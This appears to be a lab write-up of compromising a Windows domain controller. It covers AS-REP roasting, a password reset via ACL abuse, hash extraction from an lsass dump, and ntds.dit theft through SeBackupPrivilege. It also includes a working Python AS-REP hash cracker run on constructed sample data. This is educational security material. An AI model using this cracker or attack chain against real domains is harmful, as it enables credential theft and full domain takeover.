
Target Experience:

My observations while working this target:

Tools:

The recommended tools for this lab were:

Vulnerabilities:

· Exposed Usernames

Information Gathering:

I scanned the target with Nmap using service version detection (-sV), OS detection (-O), default script scanning (-sC) and verbose output (-v), saving the output to a file for later reference.

Figure 1: Nmap Scan
Figure 2: CME Enumeration
Figure 3: Share Enumeration

Foothold:

Part 1:

After identifying that the entries in the enumerated share were most likely valid user account names, I created a user list in preparation for password spraying and ASREPRoasting.

Figure 4: Users.lst
Figure 5: ASREPRoast
Figure 6: ASREP Hash
Figure 7: Cracked Hash
Figure 8: Validated Credentials
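The AS-REP hash captured in Figure 6 and cracked in Figure 7 is an RC4-HMAC (etype 23) encrypted part, and "cracking" it means re-deriving the key from each candidate password and checking the HMAC-MD5 checksum. The following is an added example, not code from the original write-up: it implements that check in pure Python (hashcat mode 18200 / john's krb5asrep format, the line format printed by impacket's GetNPUsers.py with -format hashcat). The account name, realm, password, confounder and wordlist are all constructed for the demonstration; MD4 is implemented by hand because hashlib often lacks it on OpenSSL 3.

```python
"""Offline AS-REP (etype 23, RC4-HMAC) cracking as hashcat 18200 / john do it.
Added illustration, not the author's tooling. Every input below is constructed."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); the NT hash is MD4 over UTF-16LE."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, order, shifts, const in rounds:
            for i in range(16):
                t = (a + fn(b, c, d) + x[order[i]] + const) & MASK
                a, b, c, d = d, _rotl(t, shifts[i % 4]), b, c
        h = [(v + w) & MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (KSA + PRGA)."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# RFC 4757: RC4-HMAC uses key usage 8 (not 3) for the AS-REP enc-part.
AS_REP_KEY_USAGE = 8


def ntlm_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos long-term key is exactly the NT hash."""
    return md4(password.encode("utf-16-le"))


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes):
    """RFC 4757 encrypt: returns (checksum, ciphertext) for the AS-REP enc-part."""
    k1 = _hmac_md5(key, struct.pack("<I", AS_REP_KEY_USAGE))
    checksum = _hmac_md5(k1, confounder + plaintext)
    k3 = _hmac_md5(k1, checksum)
    return checksum, rc4(k3, confounder + plaintext)


def parse_asrep_line(line: str):
    """Parse hashcat 18200 format: $krb5asrep$23$user@REALM:checksum$encdata."""
    prefix = "$krb5asrep$23$"
    if not line.startswith(prefix):
        raise ValueError("not an etype-23 AS-REP line")
    principal, rest = line[len(prefix):].split(":", 1)
    checksum_hex, enc_hex = rest.split("$", 1)
    return principal, bytes.fromhex(checksum_hex), bytes.fromhex(enc_hex)


def crack_asrep(line: str, wordlist):
    """Derive K1/K3 from each candidate, decrypt, accept only if the HMAC matches."""
    _, checksum, enc = parse_asrep_line(line)
    for candidate in wordlist:
        k1 = _hmac_md5(ntlm_hash(candidate), struct.pack("<I", AS_REP_KEY_USAGE))
        plain = rc4(_hmac_md5(k1, checksum), enc)
        if hmac.compare_digest(_hmac_md5(k1, plain), checksum):
            return candidate
    return None


def make_asrep_line(user, realm, password, plaintext, confounder):
    """Build a line shaped like GetNPUsers.py output (constructed, for testing only)."""
    checksum, enc = rc4_hmac_encrypt(ntlm_hash(password), plaintext, confounder)
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${enc.hex()}"


# Constructed sample: invented principal, realm, password, confounder and enc-part.
SAMPLE_LINE = make_asrep_line("support", "EXAMPLE.LOCAL", "Spring2020!",
                              b"\x79\x81\x00constructed EncASRepPart", b"confound")
SAMPLE_WORDLIST = ["Winter2019", "Password1", "Spring2020!", "Summer2020!"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_asrep(SAMPLE_LINE, SAMPLE_WORDLIST))
```

The full HMAC check is what makes a hit trustworthy; hashcat shortcuts it by looking for the ASN.1 prefix of EncASRepPart in the decrypted bytes for speed, but the checksum is the definitive test. Note that the account only yields this hash because pre-authentication is disabled on it, which is the misconfiguration behind Figure 5.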

Part 2:

I’ll have to admit that I had issues with trying to figure this part out. And by far, this was the most difficult part for me. I would usually execute a SharpHound collector, but those attempts returned with no visible results within BloodHound. I attempted a few other enumeration attempts, but was not having any luck. I turned to the forums and folks commented “what can a support account do?”

Figure 9: PowerShell RunAs
Figure 10: Invoke-ACLScanner Results (audit2020)
Figure 11: SID Identification
Figure 12: Domain Password Policy
Figure 13: Password Change and Validation

Part 3:

Using the audit2020 account, I enumerated the shares with CME. I noted that the audit2020 account had read access to the forensics folder.

Figure 14: Enumerated Shares
Figure 15: Discovered lsass.zip
Figure 16: Extracted Hash
Figure 17: CME Credential Validation

Privilege Escalation:

With validated credentials, I launched Evil-WinRM to connect to the target and enumerated privileges.

Figure 18: SeBackupPrivilege
Figure 19: shadowcopy.cmd & shadow.txt
Figure 20: Diskshadow Execution
Figure 21: Copy-FileSeBackupPrivilege (ntds.dit)
Figure 22: Extract Key & Download Files
Figure 23: Extracted Hashes
Figure 24: Escalated Privileges (DA)

References:

https://malicious.link/post/2017/reset-ad-user-password-with-linux/

Disclaimer:

This article is made available for educational purposes only. In addition, it provides general information on cyber security topics used for “Ethical Hacking”.

Cyber Security Enthusiast
